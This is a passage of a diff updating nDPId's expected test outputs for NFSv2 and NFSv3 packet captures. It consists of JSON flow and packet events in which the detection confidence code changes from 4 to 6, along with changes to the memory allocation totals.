-00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338880,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338410,"flow_last_seen":944207338430,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":944207338490,"flow_last_seen":944207338840,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":15876,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338450,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3292,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338400,"flow_last_seen":944207338410,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3289,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338440,"flow_last_seen":944207338450,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3291,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338880,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3293,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338410,"flow_last_seen":944207338430,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":671,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207338890,"flow_last_seen":944207338890,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":686,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":944207338490,"flow_last_seen":944207338840,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":15876,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":944207338890,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1023,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":156,"source":"nfsv2.pcap","alias":"nDPId-test","packets-captured":156,"packets-processed":156,"total-skipped-flows":0,"total-l4-payload-len":16592,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":39,"global_ts_msec":944207338890} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 156/156 @@ -45,9 +45,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880327 bytes -~~ total memory freed........: 5880327 bytes -~~ total allocations/frees...: 118294/118294 +~~ total memory allocated....: 6013961 bytes +~~ total memory freed........: 6013961 bytes +~~ total allocations/frees...: 121056/121056 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 814 chars diff --git a/test/results/nfsv3.pcap.out b/test/results/nfsv3.pcap.out index a576a4bb8..88d044017 100644 --- a/test/results/nfsv3.pcap.out +++ b/test/results/nfsv3.pcap.out @@ -2,45 +2,45 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":944207397280} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397280,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":944207397280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207397280,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZTwAAEAR0rqLGRYCixkWZgzfAG8ASDUOOENPaQAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAADAAAAA3VkcAAAAAAAAAAAAA=="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397280,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397280,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":944207397280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207397280,"pkt":"AMCV4Bm+AMCV+E3TCABFAABM5CwAAEARU9qLGRZmixkWAgBvDN8AOGEeOENPaQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":944207397290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":944207397290,"pkt":"AMCV+E3TAMCV4Bm+CABFAABEZT0AAEAR0tGLGRYCixkWZgzgBBgAMHazOEN2WQAAAAAAAAACAAGGpQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":944207397290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207397290,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA05C8AAEARU++LGRZmixkWAgQYDOAAIP19OEN2WQAAAAEAAAAAAAAAAAAAAAAAAAAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":944207397290,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207397290,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZT4AAEAR0oSLGRYCixkWZgLCBBgAfLn3OER2WQAAAAAAAAACAAGGpQAAAAMAAAABAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397290,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":944207397310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":944207397310,"pkt":"AMCV4Bm+AMCV+E3TCABFAABk5DcAAEARU7eLGRZmixkWAgQYAsIAUI2BOER2WQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAEBCFAAAD5wAKAAAAALJaAAAAKQAKAAAAALJaAAAAKQAAAAEAAAAB"} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397320,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":944207397320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207397320,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZT8AAEAR0reLGRYCixkWZgzhAG8ASKFNOEPjKQAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqMAAAADAAAAA3VkcAAAAAAAAAAAAA=="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397320,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397320,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":944207397320,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207397320,"pkt":"AMCV4Bm+AMCV+E3TCABFAABM5DsAAEARU8uLGRZmixkWAgBvDOEAOMqQOEPjKQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAETEzOS4yNS4yMi4xMDIuOC4xAAAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397330,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":944207397330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":944207397330,"pkt":"AMCV+E3TAMCV4Bm+CABFAABEZUAAAEAR0s6LGRYCixkWZgziCAEAMF8KOEOKGQAAAAAAAAACAAGGowAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397330,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":944207397330,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":944207397330,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207397330,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA05D0AAP8RlOCLGRZmixkWAggBDOIAIOXSOEOKGQAAAAEAAAAAAAAAAAAAAAAAAAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397400,"flow_last_seen":944207397400,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":944207397400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 